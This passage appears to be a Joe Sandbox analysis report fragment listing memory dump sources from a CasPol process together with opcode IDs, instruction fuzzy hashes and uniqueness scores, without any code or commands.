                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7993793dfad6829c301ad9956a5f50f0a308f3c2c7363da63ec8d7a037d3c929
                                  • Instruction ID: 843d3996f69bc8e2ba1c453b4ebd3aed23a2a2a6443c8289cbfab6669f5eeaff
                                  • Opcode Fuzzy Hash: 7993793dfad6829c301ad9956a5f50f0a308f3c2c7363da63ec8d7a037d3c929
                                  • Instruction Fuzzy Hash: FB816E34A042159FDB05DBB9C494AADBBF2AF88314F15C569E405EF3A1DB38EC41CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bba1c2c865e01a62374e18fa18aba338e8c03f8885f79b963760eaee30dae4df
                                  • Instruction ID: 7c19bb2476f593e2f1b8a148a56e4d6b9c08b55d907fbd26800ed3848d8c3d40
                                  • Opcode Fuzzy Hash: bba1c2c865e01a62374e18fa18aba338e8c03f8885f79b963760eaee30dae4df
                                  • Instruction Fuzzy Hash: B371F730B883948FE716D7B9C85476E3BF5AF85204F1684AAD04ADB3A2DE29DC058752
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d22e2609104f7092f9ae7bd34d321566cce5a113c7d2164a87bc4b94d6bf122f
                                  • Instruction ID: cee816339c9ade16a40e73ad881f618094412699a8650d826020d453de628440
                                  • Opcode Fuzzy Hash: d22e2609104f7092f9ae7bd34d321566cce5a113c7d2164a87bc4b94d6bf122f
                                  • Instruction Fuzzy Hash: 5971B575F042548FCB45DBB8C854BADBBF5AF89310F15C0AAD509EB392DA34AD01CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 64934ca220d21b2867dff5d4feacceda009c4d3bfe28676d312b23ca867d87fa
                                  • Instruction ID: 01d223650351bd279fbbb0a66735a9deda4f2a2cf8d718219dc1517d47468f9a
                                  • Opcode Fuzzy Hash: 64934ca220d21b2867dff5d4feacceda009c4d3bfe28676d312b23ca867d87fa
                                  • Instruction Fuzzy Hash: CC61B031E003149FDB15DBB9C45069EBBF6AF88344F258528D405EB3A5EB78EC02CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd50b838d61f0826a150efdaec3e6fd8092e9be09aca634b785af43e55c58346
                                  • Instruction ID: d7070d2d35d8a52c668e0aadfb0a279baa266ac3649937e00b09e932ef4f4413
                                  • Opcode Fuzzy Hash: cd50b838d61f0826a150efdaec3e6fd8092e9be09aca634b785af43e55c58346
                                  • Instruction Fuzzy Hash: C661F370A443849FEB219BB8C8D4B5DBBF29F81314F11C61DE106AB7A1DBB95C048B62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7d7e12a56da51b4cab4fb73d05648658db05b7ba5c922cb06874abcfb9a565d5
                                  • Instruction ID: 231847506e55a7e5efd816b05a3db68bb3a101d1828afe6bf4e7c623bf531f63
                                  • Opcode Fuzzy Hash: 7d7e12a56da51b4cab4fb73d05648658db05b7ba5c922cb06874abcfb9a565d5
                                  • Instruction Fuzzy Hash: 90619574B083858FD706DBB8C854B5D7FF1AF8A304F1AC5AAD405EB2A2DA349C45CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a2fb3a0f0c8012e7108f59bb3e308cd21ba7964c7e781155b8896d0aa3211109
                                  • Instruction ID: 6fab328a20c5534eaa4f8b9e1ee17afa5c6290bbfad42ca676b9f5b96bb8cc8f
                                  • Opcode Fuzzy Hash: a2fb3a0f0c8012e7108f59bb3e308cd21ba7964c7e781155b8896d0aa3211109
                                  • Instruction Fuzzy Hash: 1C618E30B002158FCB14EBB8C498AAD77F6FF88355B258479E50ADB3A5DF399C018B52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2fe58288aca8ed011d3c7e6cb6c7d2f689a006499cd897edbbba4da81d4e50a7
                                  • Instruction ID: b1774654555af4f20225b4df6e43b10aefdc1cb5d8513cb02f3b0bfcc003e47c
                                  • Opcode Fuzzy Hash: 2fe58288aca8ed011d3c7e6cb6c7d2f689a006499cd897edbbba4da81d4e50a7
                                  • Instruction Fuzzy Hash: 8B51E635F042559FDB05DBB8C850ABE7FF6AF89210F1980A9E505DB3A1DE389D01CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 28cf167d2a54a758e9ff38f1c02c93604afaeb45d58df5335fc45427a1a6d43f
                                  • Instruction ID: 2932949391d805a3d7ca0b5814fe18857afa92d70c066c9aae34df36f9120e14
                                  • Opcode Fuzzy Hash: 28cf167d2a54a758e9ff38f1c02c93604afaeb45d58df5335fc45427a1a6d43f
                                  • Instruction Fuzzy Hash: B051D231B483518FD702EB78980875E3BF69F89704F0584BAD608DF392EA35DC0587A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c65adad49281396179c606bc04b6e819cdec70a73a576c466f6d346087e9a33
                                  • Instruction ID: 002a6d2f649087347dfc138c83e2c1ab5942da992e0aaa31c9030ab7ccbb03f4
                                  • Opcode Fuzzy Hash: 7c65adad49281396179c606bc04b6e819cdec70a73a576c466f6d346087e9a33
                                  • Instruction Fuzzy Hash: 11518F31F002249FCB14EBB8C49869DB7F6AF88365B258538D506EB355DF39EC428B52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e044caacccdab3f818c06807bae5e444249bf5eb9fad2325148f66741088337
                                  • Instruction ID: 77514893b4229ffdb89886760d5e09b9e36cea41716f19b5111be07eeaa3f95b
                                  • Opcode Fuzzy Hash: 6e044caacccdab3f818c06807bae5e444249bf5eb9fad2325148f66741088337
                                  • Instruction Fuzzy Hash: 92112575F001188FCB41EBBDD854AAFBBF6AB8C6507208069D50DE7354EE34AD019BE2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 48e01055b549c0022ac57339fbb15a29730329772972332f64315288f723d225
                                  • Instruction ID: a6939fdfe18e64bd7bbff48af72c9f4abd8e01a9b960bbe1160ea8bb965b82aa
                                  • Opcode Fuzzy Hash: 48e01055b549c0022ac57339fbb15a29730329772972332f64315288f723d225
                                  • Instruction Fuzzy Hash: 26116575F012189FCB40EBBDC454AAE7BF6AB8C650720806DD50DE7354EE34AD028BD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1c8b709af96f6ca2b1c5b7f05396ebf2b62a0489d5c73c1b07348483e895cf7e
                                  • Instruction ID: b7a880c432abc1d7d3cf9ee6eb752c7919591b4b1315237674b061b01b386a88
                                  • Opcode Fuzzy Hash: 1c8b709af96f6ca2b1c5b7f05396ebf2b62a0489d5c73c1b07348483e895cf7e
                                  • Instruction Fuzzy Hash: CB115676F001188FCB44EBBDC454A9E7BF6AB8C6507508069D50DE7354EE34AD028792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fc9f57d4a777979955ebfe20149c864716f26e526c6c8036c97d11b050fd939b
                                  • Instruction ID: e7094b3f40382b01aedda41f749135a4e0ea6f83e4db5511c03694ac3527c435
                                  • Opcode Fuzzy Hash: fc9f57d4a777979955ebfe20149c864716f26e526c6c8036c97d11b050fd939b
                                  • Instruction Fuzzy Hash: D1010432B052984FCB41EBB8846829FBFF5DF89314F0400BAD506E7281EA285D0583A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eda85d0d9f6270a18d55ac9b1d07fa3e16aeebc18dab74250424b89a29381e42
                                  • Instruction ID: 3ef0341d762c461d318a7e5d574082df345cd304c824c93091ba5d7140979272
                                  • Opcode Fuzzy Hash: eda85d0d9f6270a18d55ac9b1d07fa3e16aeebc18dab74250424b89a29381e42
                                  • Instruction Fuzzy Hash: B8017B71F101785BCF54A3B8841825E7BE59F886A4F154538E906D73C4FE2C8D0183C2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f4175653eccd75470e37ac025183f3afd311495c60c02e475833c04e7e28064b
                                  • Instruction ID: bc622a69096206b7d41d2510fe38a692d6d62a94d9b5253a58bc52e88b16011f
                                  • Opcode Fuzzy Hash: f4175653eccd75470e37ac025183f3afd311495c60c02e475833c04e7e28064b
                                  • Instruction Fuzzy Hash: 11014531D05255AFCB02DB74D814EAD7FB0AF00210F0780EAE944CF2A2DA34DD449791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 012efdc06d5eb8b91fb89305a6250058bb0580c5e7b1e3779c411224166e68f1
                                  • Instruction ID: ef5e19f91ec00992274882448e1881639875a8a345f76e60ae1cf9499085f747
                                  • Opcode Fuzzy Hash: 012efdc06d5eb8b91fb89305a6250058bb0580c5e7b1e3779c411224166e68f1
                                  • Instruction Fuzzy Hash: 62F04C36F14118A7D71496BD5C102DEBBFD9B88361F144039F905D7281DB75AD40C7D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fbd3c205356d00310a857e495da8e58c6be6643b77b25d917d339669f898d108
                                  • Instruction ID: f6d3d2f94695c8bb848ed582c077a41b216d5ef99d3864ed5761cf647e50fa2e
                                  • Opcode Fuzzy Hash: fbd3c205356d00310a857e495da8e58c6be6643b77b25d917d339669f898d108
                                  • Instruction Fuzzy Hash: 59019E74A08351AFCB09EB3DC09491C7BF1AFC0226B40891DE589CB3A0EA39A905CB13
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9473ad2653ec65c11f010e69f8b7beb683c350c8ea3033a305cd5bb0ae4056b6
                                  • Instruction ID: a20e60443d65a1c8a16c0317b88bf0a8127915396c9d9ae5949994102fd6b9bb
                                  • Opcode Fuzzy Hash: 9473ad2653ec65c11f010e69f8b7beb683c350c8ea3033a305cd5bb0ae4056b6
                                  • Instruction Fuzzy Hash: 32F03C75E502688FDB10AFF5884828DBBB8EB883A1F554429E906D7244EB384945CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 62fc10896a93367e6e11ba136d8fac28433d36b43540714f50f934dbdbfd06cd
                                  • Instruction ID: 0576c1f5c9ebf1970afe4b733d75a038d6b769cf06d5099cd2cabbea0b078c39
                                  • Opcode Fuzzy Hash: 62fc10896a93367e6e11ba136d8fac28433d36b43540714f50f934dbdbfd06cd
                                  • Instruction Fuzzy Hash: 2CF08232F001585BCB58DABED8555DFBBFAABC8250F11807ADA05E3240EE359D0487D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d7443b8af35848a3db154bf1ae728f9a860e5d17912e14411e04fc107c2fd60f
                                  • Instruction ID: 73e270b4495094e952a4c69bf4374f96945a8a23e953d95f96a87943044c86a6
                                  • Opcode Fuzzy Hash: d7443b8af35848a3db154bf1ae728f9a860e5d17912e14411e04fc107c2fd60f
                                  • Instruction Fuzzy Hash: CFE06D36F001188BCF05E7B8D44499DB3F2EB881143208068D50DE7261DE34AD028752
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a64c4811caa1f5b3362f33c33bbfe48026fd4e774b146678c120521544646b57
                                  • Instruction ID: 9634fcbf44909ac2251c95d21d4f365164b112fff5052580959a79e3bad61ad1
                                  • Opcode Fuzzy Hash: a64c4811caa1f5b3362f33c33bbfe48026fd4e774b146678c120521544646b57
                                  • Instruction Fuzzy Hash: 52E01236F016189BCF05E7B8D5949ADB3F1EF8C2157208079D50DE7365DE35AD028752
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a7b5368df729c779517bbe3dd46faa3da24fa9a89c8e855a27ed9619535ff020
                                  • Instruction ID: ad286b1c47b6e22fddd6c1e01fc9b5db9b847e4f46136cc8b75ef38888298f6c
                                  • Opcode Fuzzy Hash: a7b5368df729c779517bbe3dd46faa3da24fa9a89c8e855a27ed9619535ff020
                                  • Instruction Fuzzy Hash: AAE06D36F001188BCF05E7B8D5449ACB3F1EF881143208079D209E7265DE34AD028752
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ae55f6ac331ca2572324bd569f341ce0e9eb1cb852a8b190d448ff7624dd7de5
                                  • Instruction ID: 831f8c911fe1d251bbe2b92d79c1838961925a73eb10397edd3082cf06349b9d
                                  • Opcode Fuzzy Hash: ae55f6ac331ca2572324bd569f341ce0e9eb1cb852a8b190d448ff7624dd7de5
                                  • Instruction Fuzzy Hash: B3E0ED36F005188BCF45E7B8D55499DB3F5AB881547208079D509E7265DE35AD028762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 18cd5e48faf461fb3d44606ebc304c1d01ed3763981a741acc8c88060ded5fdb
                                  • Instruction ID: 2471b0bf1b28a6e3dbfb7186ef363f8320baa7a7aed7d9ae0be7ef46b2750808
                                  • Opcode Fuzzy Hash: 18cd5e48faf461fb3d44606ebc304c1d01ed3763981a741acc8c88060ded5fdb
                                  • Instruction Fuzzy Hash: 45E09236F001188BCF05E7B8D5549ACB7F1EF8C21432080B8D10DE33A5DE34AD028752
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 13860900afdeed81233f127956f83b66a397f9f21879f024fa2fc9aa22797d49
                                  • Instruction ID: 91bb2f4441dc2652effbd8ae834aa4008535d622257c2f7f26651d53a5249900
                                  • Opcode Fuzzy Hash: 13860900afdeed81233f127956f83b66a397f9f21879f024fa2fc9aa22797d49
                                  • Instruction Fuzzy Hash: ECE06D36F001188BCF05E7F8D54499CB3F1AB881143208079D509E3365DE34AE018752
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0f65c508ddb7164409aea37c45fe797a932fdb33c5c72b06b6f83a330b3e2088
                                  • Instruction ID: 77024c5f6fd6c65b87ca0eca5296826ab537ec9f3d4cfbad3d8ecb2ba4f8b81a
                                  • Opcode Fuzzy Hash: 0f65c508ddb7164409aea37c45fe797a932fdb33c5c72b06b6f83a330b3e2088
                                  • Instruction Fuzzy Hash: F6E0ED36F005188BCF05E7B8D4449ADB3F1AB881147208069D509E7265EE35AE019762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff656afac5c453b783b362105ea18645a3a2459f7b76c3aa66eb8ee51f83d1a3
                                  • Instruction ID: 06e7652d21673ae3134f69eedf09043b9b0995726399f1be0970e56ecb31ba33
                                  • Opcode Fuzzy Hash: ff656afac5c453b783b362105ea18645a3a2459f7b76c3aa66eb8ee51f83d1a3
                                  • Instruction Fuzzy Hash: BBE09236F001188BCF05E7B8D4449ACB3F6EF8C2243208079D50DE3361EE34AD028762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9370af7151d2ec9b87f8aafd08888b73a564a348260dc929aeebe6c611421113
                                  • Instruction ID: e5567a5cf2a9ab18e36fbc086727b159da0039d7c7b3f4d5686b4e077fadfc0d
                                  • Opcode Fuzzy Hash: 9370af7151d2ec9b87f8aafd08888b73a564a348260dc929aeebe6c611421113
                                  • Instruction Fuzzy Hash: 64E0ED36F005189BCF05E7B8E5549ADB3F1EF881247208069D509E7265EE35AD028B52
                                  Uniqueness

                                  Uniqueness Score: -1.00%